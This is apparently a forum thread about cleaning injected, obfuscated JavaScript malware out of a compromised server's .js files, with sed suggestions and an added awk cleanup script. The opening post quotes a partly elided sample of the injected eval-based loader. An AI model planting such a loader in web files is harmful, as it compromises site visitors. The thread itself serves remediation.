Removing obfuscated JavaScript from .js files

Hello, I am trying to remove obfuscated code from multiple files on a server; the malicious code is surrounded by

/*km0ae9gr6m*//*qhk6sa6g1c*/

I had success removing it from some files using this command

sed -i ':strt;s|/\*km0ae9gr6m\*/[^/]*/\*qhk6sa6g1c\*/||g;/\/\*km0ae9gr6m\*\//{N;b strt}' fileaffected.js

But it failed on this pattern

/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[312,420,100,200,303,440,34,118,96,40,32
...
more bytecode
...
,68,312,420,100,200,303,440,34,118,96,40,32,64,96,128,32,64,96,128,32,64,96,128,100,222,297,468,109,202,330,464,46,196,333,400,121,92,291,448,112,202,330,400,67,208,315,432,100,80,315,408,114,218,123,236,10,64,96,128,32,64,96,128,32,250,30,128,32,64,96,500,99,194,348,396,104,80,303,164,123,250,30,500,44,64,159,192,48,82,177];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/

Any suggestions?

This is not the answer you wanted: But have you considered restoring the files from backup?

You also probably need to run something like rootkit hunter on your system. Otherwise the clean code will be messed up again in no time. And did you patch or plug the hole the exploit used to attack your system?

Welcome to the forums, cuantica:

Someone had a similar problem very recently. This post may be of use to you: How to remove the last 3 lines from many files? Post: 302662831

Regards,
Alister

1 Like

Thanks Jim, backups are not an option. This issue happened due to an unpatched Plesk box, so I decided to move the sites to cPanel.

Regarding the thread suggested by Alister, I had checked it before posting and decided to open a new thread, as the person trying to fix this was considering 3 lines, and in some files the infection uses only one line, so using that approach would modify the valid file contents. BTW this seems to be related to my box too, but it was posted by the person to whom we had delegated administration :(

It is safer to remove them using the pattern. It worked fine, but I don't know how to escape the scripting at the beginning and end of the pattern to just consider

/*km0ae9gr6m*/malware/*qhk6sa6g1c*/

---------- Post updated at 11:31 AM ---------- Previous update was at 11:02 AM ----------

Any suggestions?

I'm no sed expert, but have you tried something like this:

sed -n '/\/\*km0ae9gr6m\*\//,/\/\*qhk6sa6g1c\*\//!p' filename

This is essentially

sed -n '/start/,/end/!p'

i.e. output anything except the lines in the range (inclusive).

The proposed sed escapes every character in the search strings which is special to sed (i.e. / and *).

Tested on your sample data.

1 Like
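An added example, not code from anyone in this thread: the original sed fails on the second sample because its `[^/]*` cannot cross the `/` characters inside the payload (`-012/5`, `n[k]/(...)`), and the range form above drops whole lines, which is exactly the problem the original poster raised for one-line infections where legitimate code shares the line. The script below matches the two marker comments as literal strings with awk's index(), so nothing in the payload needs escaping, a block may span several lines, and several blocks on one line are each removed on their own (a greedy sed `.*` would also eat the valid code between them). The marker strings are the ones quoted in the thread; the file names and their contents in make_sample are constructed for demonstration.

```shell
#!/bin/sh
# Added example for this thread. Removes every block delimited by the two
# marker comments quoted in the thread, keeping the legitimate code around it.

START='/*km0ae9gr6m*/'
END='/*qhk6sa6g1c*/'

# strip_blocks FILE : print FILE with every START...END block removed.
# The whole file is buffered so a block may span line breaks; markers are
# located with index(), i.e. literally, so the payload may contain '/', '*'
# or anything else. Each block is cut out individually (non-greedy).
strip_blocks() {
  awk -v s="$START" -v e="$END" '
    { buf = buf $0 "\n" }
    END {
      while ((i = index(buf, s)) > 0) {
        rest = substr(buf, i + length(s))
        j = index(rest, e)
        if (j == 0) break           # start marker with no end marker: stop, do not guess
        buf = substr(buf, 1, i - 1) substr(rest, j + length(e))
      }
      printf "%s", buf
    }' "$1"
}

# clean_file FILE : rewrite FILE in place (keeping FILE.bak) only if it is
# infected; clean files are left untouched, so mtimes stay meaningful.
clean_file() {
  grep -qF "$START" "$1" || return 0
  tmp=$(mktemp) || return 1
  strip_blocks "$1" > "$tmp" && cp -p "$1" "$1.bak" && cat "$tmp" > "$1"
  rc=$?
  rm -f "$tmp"
  return $rc
}

# count_markers FILE : number of start markers still present (0 means clean)
count_markers() {
  grep -oF "$START" "$1" | wc -l | tr -d ' '
}

# make_sample DIR : write two constructed infected files (not real samples):
# a block spanning two lines whose body contains '/', and a line carrying
# two separate blocks with valid code between them.
make_sample() {
  printf '%s\n' 'var a = 1;' \
    '/*km0ae9gr6m*/try{h=-012/5;n=[1,2' \
    ',3];}catch(e){}/*qhk6sa6g1c*/' \
    'var b = 2;' > "$1/multi.js"
  printf '%s\n' \
    'x=1;/*km0ae9gr6m*/evil()/*qhk6sa6g1c*/y=2;/*km0ae9gr6m*/more()/*qhk6sa6g1c*/z=3;' \
    > "$1/one.js"
}
```

To run it over a document root, source the file and loop with `find /path/to/docroot -type f -name '*.js' -exec sh -c '. ./clean.sh; for f; do clean_file "$f"; done' sh {} +`, then grep the tree for the start marker once more to confirm nothing is left. Keep the `.bak` copies until the box has been rebuilt or the entry point closed; as Jim noted, cleaning the files without fixing the hole only buys time.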

Same discussion over at How to remove the last 3 lines from many files?